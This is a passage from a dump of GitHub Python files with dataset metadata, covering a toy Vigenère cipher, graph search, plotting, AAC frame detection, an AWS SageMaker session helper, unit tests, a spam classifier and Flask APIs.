Contours.py","file_name":"CV Drawing Contours.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"1329804146","text":"alphabet = {0:'A',1:'B',2:'C',3:'D',4:'E',5:'F',6:'G',7:'H',8:'I',9:'J',10:'K',11:'L',12:'M',13:'N',14:'O',15:'P',16:'Q',17:'R',18:'S',19:'T',20:'U',21:'V',22:'W',23:'X',24:'Y',25:'Z', 26:',', 27:'.', 28:'-'}\n\ndef encrypt_message(plain_text, key):\n    cipher_text = \"\"\n    key_count = 0\n    plain_text = capitalize_text(plain_text)\n    key 

= capitalize_text(key)\n text_length = len(plain_text)\n key_length = len(key)\n master_key = make_key(text_length, key_length, key)\n for char in plain_text:\n if str.isalpha(char) == True:\n cipher_key = ((return_key(char) + return_key(master_key[key_count])) % 29)\n cipher_text = cipher_text + alphabet[cipher_key]\n else:\n cipher_key = ((return_key(char) + return_key(master_key[key_count])) % 29)\n cipher_text = cipher_text + alphabet[cipher_key]\n key_count = key_count + 1\n return cipher_text\n\ndef decrypt_message(encrypt_text, key):\n plain_text = ''\n key_count = 0\n encrypt_text = capitalize_text(encrypt_text)\n key = capitalize_text(key)\n text_length = len(encrypt_text)\n key_length = len(key)\n master_key = make_key(text_length, key_length, key)\n for char in encrypt_text:\n if str.isalpha(char) == True:\n plain_value = ((return_key(char) - return_key(master_key[key_count])) % 29)\n plain_text = plain_text + alphabet[plain_value]\n else:\n plain_value = ((return_key(char) - return_key(master_key[key_count])) % 29)\n plain_text = plain_text + alphabet[plain_value]\n key_count = key_count + 1\n return plain_text\n\ndef return_key(letter):\n for index in alphabet.keys():\n if alphabet[index] == letter:\n \treturn int(index)\n\ndef reverse_key(key):\n txt = []\n #goes through string in from last char to first char\n for i in range(len(key)-1, -1, -1):\n #appends each char to txt\n txt.append(key[i])\n return \"\".join(txt)\n\ndef make_key(t_length, k_length, key):\n while t_length > k_length:\n #adds key and reverse key\n key = key + reverse_key(key)\n #gets new length of key; should be 2xlen(key)\n k_length = len(key)\n if k_length > t_length:\n #shortens key to be the same as the plain_text\n key = key[0:t_length]\n return key\n\ndef capitalize_text(text):\n text = str.upper(text)\n text = text.replace(\" \", \"\")\n return text\n\ndef print_list(string, read):\n\tprint(string + ('').join(str(x) for x in read))\n\ndef shift_hash(binary):\n\treturn binary[12:] + binary[:12]\n\ndef get_bits(s, woof):\n bit = \"{0:08b}\".format(ord(s))\n for x in range(0,8):\n woof[x] = bit[x:x+1]\n return woof\n\ndef get_first_byte(woof):\n return woof[:8]\n\ndef compare_byte(woof, ruppy, check):\n hi = int((\"\").join(woof),2)\n there = int((\"\").join(map(str,ruppy)),2)\n #print_list(\"first 8:\", ruppy)\n #print_list(\"letter: \", woof)\n wow = hi ^ there\n howdy = \"{0:08b}\".format(wow)\n for x in range(0, 8):\n check[x] = howdy[x:x+1]\n \n #print_list(\"equals: \", check)\n return check\n\n\ndef add_bits(s, woof):\n\tbit = \"{0:08b}\".format(ord(s))\n\tfor x in range(0,8):\n\t\t\twoof[x] = bit[x:x+1]\n\treturn woof\n\ndef hash_input(string):\n new = [0] * 32\n car = [0] * 8\n test = [0] * 8\n check = [0] * 8\n for s in string:\n #print_list(s + \": \\t\", new)\n shifted = shift_hash(new)\n #print_list(\"Shift:\\t\", shifted)\n select = get_first_byte(shifted)\n added = get_bits(s, car)\n result = compare_byte(added, select, check)\n #print_list(\"Result:\\t\", result)\n new = result + shifted[8:]\n #print_list(\"New:\\t\", new)\n return new\n\ndef prompt_user():\n print(\"Would you like to encrypt or decrypt? \")\n print(\"1-Encrypt\")\n print(\"2-Decrypt\")\n print(\"3-Hash\")\n print(\"4-Exit\")\n print()\n answer = input(\"So, what's it going to be? 
\")\n try:\n \ta = int(answer)\n except ValueError:\n \tprint(\"Pleas input a valid ineger\")\n \tprompt_user()\n if int(answer) == 1:\n plain_text = input(\"Enter in a message to be encrypted: \")\n key = input(\"Enter in a key: \")\n encrypt_text = encrypt_message(plain_text, key)\n print(\"Encrypted message: \")\n print(encrypt_text)\n prompt_user()\n elif int(answer) == 2:\n encrypt_text = input(\"Enter in a message to be decrypted: \")\n key = input(\"Enter in a key: \")\n decrypt_text = decrypt_message(encrypt_text, key)\n print(\"Decrypted message: \")\n print(decrypt_text)\n prompt_user()\n elif int(answer) == 3:\n plain_text = input(\"Enter in a message to be hashed: \")\n key = input(\"Enter in a key: \")\n hash_string = plain_text + key\n result = hash_input(hash_string)\n together = ('').join(str(x) for x in result)\n print(\"\")\n print(\"Hashed: \" + together)\n hexed = \"{0:0x}\".format(int(together,2))\n print(\"Hexed: \\t\" + hexed)\n print(\"\")\n prompt_user()\n elif int(answer) == 4:\n \tprint(\"Thanks! Have a good day!\")\n else:\n print(\"You did not enter a valid answer\")\n prompt_user()\n\nprompt_user()","repo_name":"mthurin/Vigenere-Cipher-Hash-Function","sub_path":"vigenere_cipher_hash.py","file_name":"vigenere_cipher_hash.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"36886439296","text":"\"\"\"\nDefinition for Undirected graph node\nclass UndirectedGraphNode:\n def __init__(self, x):\n self.label = x\n self.neighbors = []\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n @param: graph: a list of Undirected graph node\n @param: s: Undirected graph node\n @param: t: Undirected graph nodes\n @return: an integer\n \"\"\"\n def sixDegrees(self, graph, s, t):\n queue = collections.deque([s])\n seen = set([s.label])\n dist = 0\n while queue:\n for _ in range(len(queue)):\n q = queue.popleft()\n if q.label == t.label:\n return dist\n for nb in q.neighbors:\n if nb.label not in seen:\n queue.append(nb)\n seen.add(nb.label)\n dist += 1\n return -1\n","repo_name":"zhiqiuli/Lintcode","sub_path":"531-Six-Degrees.py","file_name":"531-Six-Degrees.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"73365471677","text":"import svgwrite, os\r\n\r\nos.chdir(\"C:\\\\Users\\\\Benjamin\\\\Desktop\\\\BensFolder\\\\School\\\\ENS\\\\Saclay\\\\Stage\\\\Emmanuelle Anceaume\\\\Stage\\\\important\\\\Bitcoin viewer\\\\Stats\\\\\")\r\n\r\nfileName = \"bin\" # bin\r\n\r\nf = open(fileName + '.txt')\r\nlines = f.readlines()\r\nf.close()\r\nlinesLen = len(lines)\r\n\r\nmaxAmount = 0\r\nfor linesIndex in range(linesLen):\r\n line = lines[linesIndex]\r\n if line[-1] == \"\\n\":\r\n line = line[:-1]\r\n lineParts = line.split()\r\n hashLevel, amount = [int(linePart) for linePart in lineParts]\r\n if amount > maxAmount:\r\n maxAmount = amount\r\n\r\nwidth = 1000\r\n\r\nsvg_document = svgwrite.Drawing(filename = fileName + \"HashesStats.svg\", size = (str(width) + \"px\", str(linesLen * 15) + \"px\"))\r\n\r\ndef space(n):\r\n if n < 1000:\r\n return str(n)\r\n if n < 10000:\r\n return str(n)[0] + \" \" + str(n)[1:]\r\n if n < 100000:\r\n return str(n)[:2] + \" \" + str(n)[2:]\r\n if n < 1000000:\r\n return str(n)[:3] + \" \" + str(n)[3:]\r\n #return str(n)[:3] + \" \" + str(n)[3:]\r\n\r\nfor linesIndex in range(linesLen):\r\n line = lines[linesIndex]\r\n if line[-1] == \"\\n\":\r\n line = 
line[:-1]\r\n lineParts = line.split()\r\n hashLevel, amount = [int(linePart) for linePart in lineParts]\r\n rectSize = width * (amount / maxAmount)\r\n svg_document.add(svg_document.rect(insert = (0, linesIndex * 15), size = (str(rectSize) + \"px\", \"15px\"), stroke_width = \"1\", stroke = \"black\", fill = \"rgb(255,255,0)\"))\r\n\r\n svg_document.add(svg_document.text(str(hashLevel) + \" (\" + space(amount) + \")\", insert = (1, (linesIndex + 1) * 15 - 2)))\r\n\r\nsvg_document.save()","repo_name":"Benjamin-Loison/Mining-in-Logarithmic-Space","sub_path":"Statistics/bitcoinStatsViewer.py","file_name":"bitcoinStatsViewer.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"7953184013","text":"from aac.AACCore import *\nfrom kiLog import *\n\n\n'''\nSupport class to detect Yi4k (only) AAC blocks looking pretty suitable\nIt should be completely replaced by native AAC decoder. Eventually.\n'''\nclass AACDetect():\n\t#allowed max_sfb for [started]\n\tsfb8= [[12], [12]]\n\tsfb1= [[0,40], [40]]\n\n\tstarted= False\n\tseqNow= False\n\n\tdef __init__(self):\n\t\tself.reset()\n\n\n\tdef reset(self):\n\t\tself.started= False\n\t\tself.seqNow= False\n\n\n\tdef detect(self, _data, _limit=2):\n\t\taacStartA= []\n\t\taacPos= -1\n\n\t\t\t#spike. Yi4k limit, 30fps assumes mid-frame data have maximum 2 AACs\n\t\twhile (True if not _limit else (len(aacStartA)<_limit)):\n\t\t\taacPos= _data.find(b'\\x21', aacPos+1)\n\t\t\tif aacPos==-1:\n\t\t\t\tbreak\n\n\t\t\tif (\n\t\t\t\t(aacPos>0 and aacPos<256)\t#limit from begin\n\t\t\t\tor (len(_data)-aacPos<256)\t#limit from end\n\t\t\t):\n\t\t\t\tcontinue\n\n\n\n\t\t\taac= AACCore().aac_decode_frame(_data[aacPos:], limitSequence=self.seqNow)\n\t\t\tseqAfter= (\t#is aac ended up into sequence\n\t\t\t\taac.ics0.windows_sequence0==AACStatic.LONG_START_SEQUENCE\n\t\t\t\tor aac.ics0.windows_sequence0==AACStatic.EIGHT_SHORT_SEQUENCE\n\t\t\t)\n\n\t\t\tif (\n\t\t\t\taac.error\n\t\t\t\t#Yi4k specific:\n\t\t\t\tor (aac.ics0.max_sfb not in [self.sfb1,self.sfb8][aac.ics0.windows_sequence0==AACStatic.EIGHT_SHORT_SEQUENCE][self.started]) #allowed Maxsfb\n\t\t\t\tor (aac.ics0.use_kb_window0 == seqAfter)\t#limit combinations\n\t\t\t):\n\t\t\t\tcontinue\n\n\t\t\tif not self.started and not aac.ics0.max_sfb:\n\t\t\t\tkiLog.warn('AAC started from mid')\n\n\t\t\taacStartA.append(aacPos)\n\n\t\t\tself.seqNow= seqAfter\n\t\t\tself.started= True\n\n\n\n\n\t\taacEndA= aacStartA[1:] +[len(_data)]\n\n\t\taacA= []\t#[[start,end],..] 
pairs\n\t\tfor aacStart,aacEnd in zip(aacStartA,aacEndA):\n\t\t\taacA.append([aacStart,aacEnd])\n\n\t\treturn aacA\n\t\t","repo_name":"NikolayRag/strYim","sub_path":"src/recover/AACDetect.py","file_name":"AACDetect.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"96"} +{"seq_id":"6999059840","text":"\"\"\"AWSAccountClamp provides logic/functionality over a set of AWS IAM Services\"\"\"\nimport os\nimport boto3\nfrom botocore.exceptions import (\n ClientError,\n UnauthorizedSSOTokenError,\n TokenRetrievalError,\n)\nfrom botocore.credentials import RefreshableCredentials\nfrom botocore.session import get_session\nfrom sagemaker.session import Session as SageSession\nfrom datetime import timedelta\nimport logging\n\n\nclass AWSAccountClamp:\n def __new__(cls):\n \"\"\"AWSAccountClamp Singleton Pattern\"\"\"\n if not hasattr(cls, \"instance\"):\n # Initialize class attributes here\n cls.log = logging.getLogger(\"sageworks\")\n cls.log.info(\"Creating the AWSAccountClamp Singleton...\")\n cls.instance = super(AWSAccountClamp, cls).__new__(cls)\n cls.role_name = os.environ.get(\"SAGEWORKS_ROLE\", \"SageWorks-ExecutionRole\")\n cls.sageworks_bucket_name = os.environ.get(\"SAGEWORKS_BUCKET\")\n if cls.sageworks_bucket_name is None:\n cls.log.critical(\"Could not find ENV var for SAGEWORKS_BUCKET!\")\n raise EnvironmentError(\"Could not find ENV var for SAGEWORKS_BUCKET!\")\n try:\n cls.account_id = boto3.client(\"sts\").get_caller_identity()[\"Account\"]\n cls.region = boto3.session.Session().region_name\n except (ClientError, UnauthorizedSSOTokenError, TokenRetrievalError):\n msg = \"AWS Identity Check Failure: Check AWS_PROFILE and/or Renew SSO Token...\"\n cls.log.critical(msg)\n raise RuntimeError(msg)\n\n # Initialize the boto3 session (this is a refreshable session)\n cls.session_time_delta = timedelta(minutes=50)\n cls.boto3_session = cls._init_boto3_session()\n\n # Return the singleton\n return cls.instance\n\n @classmethod\n def check_aws_identity(cls) -> bool:\n \"\"\"Check the AWS Identity currently active\"\"\"\n # Check AWS Identity Token\n sts = boto3.client(\"sts\")\n try:\n identity = sts.get_caller_identity()\n cls.log.info(\"AWS Account Info:\")\n cls.log.info(f\"Account: {identity['Account']}\")\n cls.log.info(f\"ARN: {identity['Arn']}\")\n cls.log.info(f\"Region: {cls.region}\")\n return True\n except (ClientError, UnauthorizedSSOTokenError):\n msg = \"AWS Identity Check Failure: Check AWS_PROFILE and/or Renew SSO Token...\"\n cls.log.critical(msg)\n raise RuntimeError(msg)\n\n @classmethod\n def check_s3_access(cls, boto_session: boto3.Session) -> bool:\n s3 = boto_session.client(\"s3\")\n results = s3.list_buckets()\n for bucket in results[\"Buckets\"]:\n cls.log.info(f\"\\t{bucket['Name']}\")\n return True\n\n @classmethod\n def is_sageworks_role(cls) -> bool:\n \"\"\"Check if the current AWS Identity is the SageWorks Role\"\"\"\n sts = boto3.client(\"sts\")\n try:\n if cls.role_name in sts.get_caller_identity()[\"Arn\"]:\n return True\n except (ClientError, UnauthorizedSSOTokenError, TokenRetrievalError):\n msg = \"SageWorks Role Check Failure: Check AWS_PROFILE and/or Renew SSO Token...\"\n cls.log.critical(msg)\n raise RuntimeError(msg)\n\n @classmethod\n def sageworks_execution_role_arn(cls):\n \"\"\"Get the SageWorks Execution Role\"\"\"\n iam = boto3.client(\"iam\")\n try:\n role_arn = iam.get_role(RoleName=cls.role_name)[\"Role\"][\"Arn\"]\n return role_arn\n except 
iam.exceptions.NoSuchEntityException:\n msg = f\"Could Not Find Role {cls.role_name}\"\n cls.log.critical(msg)\n raise RuntimeError(msg)\n except UnauthorizedSSOTokenError:\n msg = \"SageWorks Role Check Failure: Check AWS_PROFILE and/or Renew SSO Token...\"\n cls.log.critical(msg)\n raise RuntimeError(msg)\n\n @classmethod\n def _session_credentials(cls):\n \"\"\"Internal: Set up our AWS Session credentials for automatic refresh\"\"\"\n\n # Assume the SageWorks Execution Role and then pull the credentials\n cls.log.debug(\"Assuming the SageWorks Execution Role and Refreshing Credentials...\")\n sts = boto3.Session().client(\"sts\")\n response = sts.assume_role(\n RoleArn=cls.sageworks_execution_role_arn(),\n RoleSessionName=\"sageworks-execution-role-session\",\n ).get(\"Credentials\")\n credentials = {\n \"access_key\": response.get(\"AccessKeyId\"),\n \"secret_key\": response.get(\"SecretAccessKey\"),\n \"token\": response.get(\"SessionToken\"),\n \"expiry_time\": response.get(\"Expiration\").isoformat(),\n }\n cls.log.debug(f\"Credentials Refreshed: Expires at {credentials['expiry_time']}\")\n return credentials\n\n @classmethod\n def _init_boto3_session(cls):\n if cls.is_sageworks_role():\n return boto3.Session()\n\n refreshable_credentials = RefreshableCredentials.create_from_metadata(\n metadata=cls._session_credentials(),\n refresh_using=cls._session_credentials,\n method=\"sts-assume-role\",\n )\n\n session = get_session()\n session._credentials = refreshable_credentials\n refreshable_session = boto3.Session(botocore_session=session)\n\n return refreshable_session\n\n @classmethod\n def boto_session(cls):\n \"\"\"Create a *refreshable* AWS/boto session so that clients don't get TOKEN timeouts\"\"\"\n return cls.boto3_session\n\n @classmethod\n def sagemaker_session(cls, session: boto3.Session = None):\n \"\"\"Create a sageworks SageMaker session (using our boto3 refreshable session)\"\"\"\n session = session or cls.boto_session()\n return SageSession(boto_session=session)\n\n @classmethod\n def sagemaker_client(cls, session: boto3.Session = None):\n \"\"\"Create a sageworks SageMaker client (using our boto3 refreshable session)\"\"\"\n session = session or cls.boto_session()\n return session.client(\"sagemaker\")\n\n\nif __name__ == \"__main__\":\n \"\"\"Exercise the AWS Account Clamp Class\"\"\"\n\n # Create the class\n aws_account_clamp = AWSAccountClamp()\n\n # Check out that AWS Account Clamp is working AOK\n \"\"\"Check if the AWS Account is Setup Correctly\"\"\"\n print(\"*** AWS Identity Check ***\")\n aws_account_clamp.check_aws_identity()\n print(\"Identity Check Success...\")\n\n print(\"*** AWS Assume SageWorks ExecutionRole Check ***\")\n check_boto_session = aws_account_clamp.boto_session()\n print(\"Assume Role Success...\")\n\n print(\"*** AWS S3 Access Check ***\")\n aws_account_clamp.check_s3_access(check_boto_session)\n print(\"S3 Access Check Success...\")\n\n print(\"*** AWS Sagemaker Session/Client Check ***\")\n sm_client = aws_account_clamp.sagemaker_client()\n print(sm_client.list_feature_groups()[\"FeatureGroupSummaries\"])\n","repo_name":"SuperCowPowers/sageworks","sub_path":"src/sageworks/aws_service_broker/aws_account_clamp.py","file_name":"aws_account_clamp.py","file_ext":"py","file_size_in_byte":6970,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"96"} +{"seq_id":"27932787793","text":"\"\"\"Unit tests for year 2022, day 22.\"\"\"\n\nfrom textwrap import dedent\n\nimport pytest\n\nfrom 
adventofcode.year2022.day22 import (\n Board,\n Cursor,\n Facing,\n Motion,\n parse_line,\n parse_data,\n part1,\n part2,\n)\n\n\n@pytest.mark.parametrize(\n 'cursor, motion, expected',\n [\n (\n Cursor(facing=Facing.R),\n Motion.R,\n Cursor(facing=Facing.D),\n ),\n (\n Cursor(facing=Facing.D),\n Motion.R,\n Cursor(facing=Facing.L),\n ),\n (\n Cursor(facing=Facing.L),\n Motion.R,\n Cursor(facing=Facing.U),\n ),\n (\n Cursor(facing=Facing.U),\n Motion.R,\n Cursor(facing=Facing.R),\n ),\n (\n Cursor(facing=Facing.R),\n Motion.L,\n Cursor(facing=Facing.U),\n ),\n (\n Cursor(facing=Facing.U),\n Motion.L,\n Cursor(facing=Facing.L),\n ),\n (\n Cursor(facing=Facing.L),\n Motion.L,\n Cursor(facing=Facing.D),\n ),\n (\n Cursor(facing=Facing.D),\n Motion.L,\n Cursor(facing=Facing.R),\n ),\n ],\n)\ndef test_cursor_rotate(cursor, motion, expected):\n result = cursor.rotate(motion)\n assert result == expected\n\n\n@pytest.mark.parametrize(\n 'cursor, expected',\n [\n (Cursor(facing=Facing.R), Cursor(1, 0, Facing.R)),\n (Cursor(facing=Facing.D), Cursor(0, 1, Facing.D)),\n (Cursor(facing=Facing.L), Cursor(-1, 0, Facing.L)),\n (Cursor(facing=Facing.U), Cursor(0, -1, Facing.U)),\n ],\n)\ndef test_cursor_move(cursor, expected):\n result = cursor.move()\n assert result == expected\n\n\n@pytest.mark.parametrize(\n 'cursor, height, width, expected',\n [\n (Cursor(3, 0), 2, 2, Cursor(1, 0)),\n (Cursor(0, 3), 2, 2, Cursor(0, 1)),\n (Cursor(-1, 0), 2, 2, Cursor(1, 0)),\n (Cursor(0, -1), 2, 2, Cursor(0, 1)),\n ],\n)\ndef test_cursor_mod(cursor, height, width, expected):\n result = cursor.mod(height, width)\n assert result == expected\n\n\n@pytest.mark.parametrize(\n 'block, expected',\n [\n ('.\\n..', Board(['. ', '..'])),\n ],\n)\ndef test_board_from_block(block, expected):\n result = Board.from_block(block)\n assert result == expected\n\n\n@pytest.mark.parametrize(\n 'board, expected',\n [\n (Board(['.']), Cursor(0, 0, Facing.R)),\n (Board([' .']), Cursor(1, 0, Facing.R)),\n ],\n)\ndef test_board_begin(board, expected):\n result = board.begin()\n assert result == expected\n\n\n@pytest.mark.parametrize(\n 'board, cursor, expected',\n [\n (Board(['.']), Cursor(), '.'),\n (Board([' .']), Cursor(1), '.'),\n (Board(['', '.']), Cursor(y=1), '.'),\n (Board(['', ' .']), Cursor(x=1, y=1), '.'),\n ],\n)\ndef test_board_at(board, cursor, expected):\n result = board.at(cursor)\n assert result == expected\n\n\n@pytest.mark.parametrize(\n 'board, cursor, move, expected',\n [\n (Board(['...']), Cursor(x=0), 1, Cursor(x=1)),\n (Board(['...']), Cursor(x=0), 2, Cursor(x=2)),\n (Board(['...']), Cursor(x=0), 3, Cursor(x=0)),\n (Board(['#..']), Cursor(x=1), 3, Cursor(x=2)),\n (Board(['.#.']), Cursor(x=2), 3, Cursor(x=0)),\n (Board([' ... ']), Cursor(x=2), 1, Cursor(x=3)),\n (Board([' ... ']), Cursor(x=2), 2, Cursor(x=4)),\n (Board([' ... ']), Cursor(x=2), 3, Cursor(x=2)),\n (Board([' #.. ']), Cursor(x=3), 3, Cursor(x=4)),\n (Board([' .#. 
']), Cursor(x=4), 3, Cursor(x=2)),\n (\n Board([' ', ' ', '.', '.', '.', ' ', ' ']),\n Cursor(y=2, facing=Facing.D),\n 1,\n Cursor(y=3, facing=Facing.D),\n ),\n (\n Board([' ', ' ', '.', '.', '.', ' ', ' ']),\n Cursor(y=2, facing=Facing.D),\n 2,\n Cursor(y=4, facing=Facing.D),\n ),\n (\n Board([' ', ' ', '.', '.', '.', ' ', ' ']),\n Cursor(y=2, facing=Facing.D),\n 3,\n Cursor(y=2, facing=Facing.D),\n ),\n ],\n)\ndef test_board_move(board, cursor, move, expected):\n result = board.move(cursor, move)\n assert result == expected\n\n\n@pytest.mark.parametrize(\n 'line, expected',\n [\n ('R10', [Motion.R, 10]),\n ('10R', [10, Motion.R]),\n ('10R5', [10, Motion.R, 5]),\n ('10RL5', [10, Motion.R, Motion.L, 5]),\n ],\n)\ndef test_parse_line(line, expected):\n result = parse_line(line)\n assert result == expected\n\n\ndef test_parse_data():\n board, moves = parse_data(DATA)\n assert board.height == 12\n assert board.width == 16\n assert len(moves) == 13\n\n\ndef test_part1():\n result = part1(DATA)\n assert result == 6032\n\n\ndef test_part2():\n result = part2(DATA)\n assert result == 0\n\n\nDATA = dedent(\n \"\"\"\\\n ...#\n .#..\n #...\n ....\n...#.......#\n........#...\n..#....#....\n..........#.\n ...#....\n .....#..\n .#......\n ......#.\n\n10R5L5R10L4R5L5\n \"\"\",\n)\n","repo_name":"cr3/adventofcode","sub_path":"tests/year2022/test_day22.py","file_name":"test_day22.py","file_ext":"py","file_size_in_byte":5097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"6344292326","text":"import eventlet\nfrom flask import Flask,render_template\nfrom rq import Queue\nfrom flask_socketio import SocketIO\nimport redis\n#from worker import r\n\napp=Flask(__name__)\napp.config[\"SECRET_KEY\"]=\"abcd123\"\n\nr=redis.Redis()\nq=Queue(connection=r)\neventlet.monkey_patch()\n\nsocketio=SocketIO(\n app,\n async_mode=\"eventlet\",\n logger=True,\n engineio_logger=True,\n allow_upgrades=True,\n cors_allowed_origins=\"*\",\n ping_timeout=10,\n ping_interval=10,\n message_queue=\"redis://\"\n)\n\n@socketio.on(\"connect\")\ndef connect():\n print('@socketio.on(\"connect\")')\n\ndef push_notification_job(data):\n socketio.emit(\"notification_js\",data)\n\n@app.route(\"/\",methods=[\"GET\"])\ndef index():\n return \"
Index Page\"\n\n@app.route(\"/push_notification/<message>\",methods=[\"GET\"])\ndef push_notification(message):\n    data={\"new_notification\":1}\n    push=q.enqueue(push_notification_job,data)\n    return f\"push notification page: {message}
\"\n\n@app.route(\"/notification\",methods=[\"GET\"])\ndef notification():\n return render_template(\"notification.html\")\n\nif __name__==\"__main__\":\n socketio.run(app,debug=True)\n","repo_name":"ishita0302/Parkezy","sub_path":"Notification.py","file_name":"Notification.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"38780979398","text":"import re\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom math import sqrt\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import roc_curve\n\n'''\nSklearn Multinomial Naive Bayes\nhttps://scikit-learn.org/stable/modules/generated/sklearn.naive_bayes.MultinomialNB.html#sklearn.naive_bayes.MultinomialNB\n'''\n\n'''\nRemove any unnecessary punctuation, extra spacing, and converting all words to lowercasing\n'''\ndef message_preprocessing(data_set):\n data_set['text'] = data_set['text'].str.replace(r'\\W', ' ', regex=True)\n data_set['text'] = data_set['text'].str.lower()\n removed_extra_whitespace = []\n\n for message in data_set['text']:\n cleaned_up = re.sub(' +', ' ', message)\n removed_extra_whitespace.append(cleaned_up)\n\n return pd.Series(removed_extra_whitespace)\n\nemail_spam = pd.read_csv('./emails.csv')\n\ndf_text = message_preprocessing(email_spam)\ndf_spam = email_spam['spam']\n\ncount_vectorizer = CountVectorizer()\ndf_text_count = count_vectorizer.fit_transform(df_text)\n\nx_training, x_testing, y_training, y_testing = train_test_split(df_text_count, df_spam, test_size=0.2, random_state=42)\n\nclassify = MultinomialNB()\nclassify.fit(x_training, y_training)\n\n\n# confusion matrix\npredicted = classify.predict(x_testing)\nconfusion_result = confusion_matrix(y_testing, predicted)\nprint(f'Confusion matrix: \\n{confusion_result}\\n')\n\n# comparison based on % accuracy\naccuracy = classify.score(x_testing, y_testing)\nprint(f'Comparison based on % accuracy: {accuracy}\\n')\n\n# comparison based on sensitivity, specificity, and precision\ntrue_positives = confusion_result[0][0]\nfalse_positives = confusion_result[0][1]\ntrue_negatives = confusion_result[1][1]\nfalse_negatives = confusion_result[1][0]\n\n# sensitivity\nsensitivity = true_positives / (true_positives + false_negatives)\n# specificity\nspecificity = true_negatives / (true_negatives + false_positives)\n# precision\nprecision = true_positives / (true_positives + false_positives)\n\nprint(f'Sensitivity: {sensitivity}, Specificity: {specificity}, Precision: {precision}\\n')\n\n# calculate roc curve\ny_score = classify.predict_proba(x_testing)[::,1] # same thing as calculating the probability estimates ie y_prob\n\nfpr, tpr, thresholds = roc_curve(y_testing, y_score, pos_label=1)\nprint(f'ROC=> false positive rate: \\n{fpr}\\n, true positive rate: \\n{tpr}\\n, thresholds: \\n{thresholds}\\n')\n\n# plot ROC\nplt.figure()\nlw = 2\nplt.plot(fpr, tpr, color=\"red\", lw=lw, label=\"ROC curve\")\nplt.plot([0,1], [0,1], color=\"black\", lw=lw, linestyle=\"--\")\nplt.xlim([0.0,1.0])\nplt.ylim([0.0,1.05])\nplt.xlabel(\"False Positive Rate (FPR)\")\nplt.ylabel(\"True Positive Rate (TPR)\")\nplt.title('Testing actual data vs testing predicted data ROC')\nplt.legend(loc=\"lower right\")\nplt.show()\n\n# 95% confidence interval for prediction accuracy\ninterval = 1.96 * 
sqrt((accuracy*(1-accuracy)) / (df_text.size * 0.2))\nprint('%.3f' % interval)\n","repo_name":"soukveda/CPSC-483-assignment-3","sub_path":"naive-bayes.py","file_name":"naive-bayes.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"10867309429","text":"from flask import Blueprint\nfrom flask_restful import Resource, Api, output_json\n\nheaders = {'Content-Type': 'application/json'}\n\nbp = Blueprint('api', __name__, url_prefix='/api')\napi = Api(bp, catch_all_404s=True)\n\n\nclass Sample(Resource):\n    def get(self):\n        response = {'data': 'this is a sample response from the \"/api\" endpoint in flask Container'}\n        return output_json(response, 200, headers)\n\n\napi.add_resource(Sample, '/')\n","repo_name":"JoseRoberts87/flask_container","sub_path":"flask_container/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"41224596867","text":"from flask import Blueprint, request\nfrom db import DB\nfrom models.countries import Country\nfrom models.institutions import Institution\nfrom middlewares.serializer import serialize\nfrom jobs.cron import add_institution, add_country\nimport datetime\n\ndb_obj = DB() ### creating an object of the DB class from db.py\ndb_session = db_obj.get_db() ### getting a database session\n\napi = Blueprint(\"api\", __name__, url_prefix=\"/api\")\n\n### GET RestAPI for institution details\n@api.route(\"/institutions\", methods = ['GET'])\ndef institutions():\n    institution = db_session.query(Institution).all()\n    return serialize(institution)\n\n### GET RestAPI for countries details\n@api.route(\"/countries\", methods = ['GET'])\ndef countries():\n    country = db_session.query(Country).all()\n    return serialize(country)\n\n### GET RestAPI for a single country's details, passed with country_id\n@api.route(\"/countries/<country_id>\", methods = ['GET'])\ndef countries_filter(country_id):\n    country = db_session.query(Country).filter(Country.country_id == country_id)\n    return serialize(country)\n\n### GET RestAPI for a single institution's details, passed with institution_id\n@api.route(\"/institutions/<institution_id>\", methods = ['GET'])\ndef institutions_filter(institution_id):\n    institution = db_session.query(Institution).filter(Institution.institution_id == institution_id)\n    return serialize(institution)\n\n### POST RestAPI to add a new institution, with or without adding a country\n@api.route(\"/institutions\", methods = ['POST'])\ndef create_institution():\n    input_data = request.json\n    country_id = request.json['country_id']\n    country_data = serialize(db_session.query(Country).filter(Country.country_id == country_id))\n    if (len(country_data['data']) == 0): ### checking whether the country already exists or not (does not exist in this case)\n        country_input_data = {}\n        country_input_data['country_id'] = country_id\n        country_input_data['country_name'] = request.json['country_name']\n        add_country(country_input_data) ### adding a new country\n        del input_data['country_name']\n        add_institution(input_data) ### adding a new institution\n        return (\"Institution and Country added successfully\")\n    if (len(country_data['data']) != 0): ### checking whether the country already exists or not (exists in this case)\n        if request.json['country_name'] == country_data['data'][0]['country_name']: ### checking country_id exists with the same name\n            del input_data['country_name']\n            add_institution(input_data) ### 
